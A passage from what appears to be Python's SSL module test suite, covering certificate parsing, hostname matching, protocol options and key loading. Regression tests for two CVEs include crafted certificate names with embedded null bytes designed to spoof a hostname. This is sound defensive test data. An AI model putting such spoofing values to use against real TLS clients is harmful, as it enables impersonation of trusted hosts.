v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'pรผthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythรถn.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythรถn.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythรถn.org'.encode("idna").decode("ascii"))
fail(cert, 'pythรถn.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
